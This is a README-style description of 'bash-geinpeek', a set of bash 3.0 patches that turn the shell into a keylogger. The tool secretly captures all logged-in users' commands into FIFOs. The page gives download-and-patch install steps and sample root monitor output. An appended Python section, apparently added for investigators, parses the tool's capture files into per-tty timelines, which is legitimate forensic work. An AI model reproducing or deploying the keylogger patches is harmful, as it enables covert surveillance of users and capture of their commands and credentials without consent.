A keylogger tool consisting of a set of patches for bash and a command. It captures the input of all logged-in users and sends it into FIFOs, so that those keystrokes can then be monitored in real time.
1. get bash-3.0.tar.gz
2. tar xzvf bash-3.0.tar.gz
3. cd bash-3.0
4. wget http://www.chollian.net/~jyj9782/geinblues/stuff/bash-geinpeek/bash-3.0-geinpeek-0.2.tar.gz
5. tar xzvf bash-3.0-geinpeek-0.2.tar.gz
6. patch < Makefile.in-geinpeek.diff
7. patch < [name of the patch file you want to add]
Patch kit list:
- execute_cmd.c-geinpeek.diff ( not stable yet )
- shell.c-geinpeek.diff ( not good )
May the force be with you, man ~
NEW FEATURE:
[root@elizabeth bash-3.0]# ./ghelper s.txt
[BASH-GEINPEEK MONITOR]
[Hint: when if you have to stop it 'CTRL+C']
Mon Feb 13 03:20:53 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty -al
Mon Feb 13 03:20:53 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty
Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ./script.sh
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ls
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ls
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ whoami
[root@elizabeth bash-3.0]# ./ghelper s.txt -i
[BASH-GEINPEEK MONITOR]
[Hint: when if you have to stop it 'CTRL+C']
Mon Feb 13 03:21:01 2006 - [file@/dev/pts/38 /tmp]$ ./script.sh
Mon Feb 13 03:21:02 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty
Mon Feb 13 03:21:03 2006 - [file@/dev/pts/38 /tmp]$ clear
The command logs marked with !s! above were executed from within a shell script.
With the -i flag, ghelper leaves them out of its standard output.
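
For an investigator who recovers a ghelper capture file from a host, the following added example (not part of bash-geinpeek) parses the line format shown above, rebuilds a per-tty timeline with or without the !s! records, and ties each !s! record to the typed command that preceded it. The function names are hypothetical, the [who@tty cwd] reading of the prompt is an assumption, and the parent/child pairing is a heuristic based on line order.

```python
import re
from datetime import datetime

# Constructed sample in the shape of the ghelper output above (not a real capture).
SAMPLE = """\
[BASH-GEINPEEK MONITOR]
Mon Feb 13 03:20:53 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty -al
Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ./script.sh
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ls
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ whoami
Mon Feb 13 03:21:03 2006 - [file@/dev/pts/38 /tmp]$ clear
"""

# Assumed field meaning: [who@tty cwd]$ command, optionally prefixed by "!s! ".
LINE = re.compile(
    r"^(?P<script>!s! )?"
    r"(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) - "
    r"\[(?P<who>[^@\]]+)@(?P<tty>\S+) (?P<cwd>[^\]]*)\]\$ "
    r"(?P<cmd>.*)$"
)

def parse(text):
    """Return one dict per command record; banner and hint lines are skipped."""
    records = []
    for m in filter(None, map(LINE.match, text.splitlines())):
        rec = m.groupdict()
        rec["script"] = rec["script"] is not None
        rec["ts"] = datetime.strptime(rec["ts"], "%a %b %d %H:%M:%S %Y")
        records.append(rec)
    return records

def timeline(records, include_script=True):
    """Group (time, command) by tty; include_script=False mirrors the -i view."""
    by_tty = {}
    for r in records:
        if include_script or not r["script"]:
            by_tty.setdefault(r["tty"], []).append((r["ts"], r["cmd"]))
    return by_tty

def script_children(records):
    """Heuristic: attach each !s! record to the last typed command on its tty."""
    parents, last = {}, {}
    for r in records:
        if r["script"] and r["tty"] in last:
            parents.setdefault(last[r["tty"]], []).append(r["cmd"])
        elif not r["script"]:
            last[r["tty"]] = r["cmd"]
    return parents
```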